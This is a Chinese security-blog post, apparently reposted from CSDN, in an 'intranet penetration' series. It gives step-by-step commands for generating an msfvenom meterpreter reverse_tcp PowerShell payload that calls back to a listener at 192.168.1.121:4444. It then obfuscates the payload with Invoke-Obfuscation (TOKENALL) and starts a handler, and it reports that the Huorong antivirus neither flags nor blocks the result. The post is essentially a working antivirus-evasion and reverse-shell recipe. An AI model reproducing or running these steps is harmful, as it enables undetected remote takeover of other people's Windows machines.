搜索
内网渗透之Windows反弹shell(四)
统计
  • 建站日期:2015-11-11
  • 文章总数:2410 篇
  • 评论总数:0 条
  • 分类总数:38 个
  • 最后更新:7月24日

内网渗透之Windows反弹shell(四)

纸飞机-JAVA追梦 / / 0 评论 / 14 阅读 /0 赞
作者有点忙,还没写简介
本文阅读 1 分钟
首页 安全分享,WEB安全 正文

目录

Windows反弹shell

07powershell代码混淆

07powershell代码混淆

启动Invoke-Obfuscation

powershell -ep bypass

Import-Module ./Invoke-Obfuscation.psd1

Invoke-Obfuscation

img

 

启动成功

img

 

用msfvenom生成一个ps1文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=4444 --arch x64 --platform wiindows -f psh-reflection -o 4444.ps1

img

 

启动完成过后,设置混淆脚本代码的位置

set scriptpath +文件位置

img

 

选择混淆方式为 TOKENALL

img

img 

 

保存混淆之后的脚本 out out.ps1

img

 

msf监听

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.121 -P 4444

img

 

运行混淆代码,火绒不报毒

img

 

执行混淆后的文件,反弹成功了,火绒没拦截

img

 

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125924949
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

相关推荐

BUUCTF Web [强网杯 2019]随便注

env: php: No such file or directory Mac 12系统解决办法

Web安全—逻辑越权漏洞(BAC)

解决windows系统 网络打印机突然无法使用的问题

发表评论

成为第一个评论的人

热门文章

1
Go语言实现MSF免杀上线、思路可转换自己生成马进行绕过免杀!
1.3k 阅读 ,
2
免杀 编译shellcode进行绕过杀软操作!
1.1k 阅读 ,
3
远控免杀系列文章与工具
1k 阅读 ,
4
WEBSEC-信息收集--第一篇
920 阅读 ,

标签TAG

最近回复

我要留言